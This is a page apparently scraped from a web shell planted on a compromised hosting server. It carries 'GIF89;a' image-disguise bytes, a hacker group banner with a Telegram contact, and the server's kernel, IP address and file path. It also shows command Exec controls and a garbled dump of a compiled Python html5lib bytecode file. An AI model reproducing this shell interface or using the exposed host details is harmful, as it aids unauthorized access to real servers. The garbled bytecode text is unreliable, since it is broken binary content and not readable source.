GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python33
/
lib
/
python3.3
/
site-packages
/
pip
/
_vendor
/
html5lib
/
treebuilders
/
__pycache__
[ HOME ]
Exec
Submit
File Name : etree_lxml.cpython-33.pyc
� 7�Re�6 c @ s- d Z d d l m Z m Z m Z d d l Z d d l Z d d l Z d d l m Z d d l m Z d d l m Z d d l m Z d d l m Z d d l j Z d Z e j d � Z e j d � j Z Gd d � d e � Z Gd d � d e � Z d d � Z d d � Z Gd d � d e j � Z d S( u� Module for supporting the lxml.etree library. The idea here is to use as much of the native library as possible, without using fragile hacks like custom element names that break between releases. The downside of this is that we cannot represent all possible trees; specifically the following are known to cause problems: Text or comments as siblings of the root element Docypes with no name When any of these things occur, we emit a DataLossWarning i ( u absolute_importu divisionu unicode_literalsNi ( u _basei ( u DataLossWarning( u constants( u etree( u ihatexmlu {([^}]*)}(.*)u asdc B s | Ee Z d Z d d � Z d S( u DocumentTypec C s | | _ | | _ | | _ d S( N( u nameu publicIdu systemId( u selfu nameu publicIdu systemId( ( uE /tmp/pip-zej_zi-build/pip/_vendor/html5lib/treebuilders/etree_lxml.pyu __init__"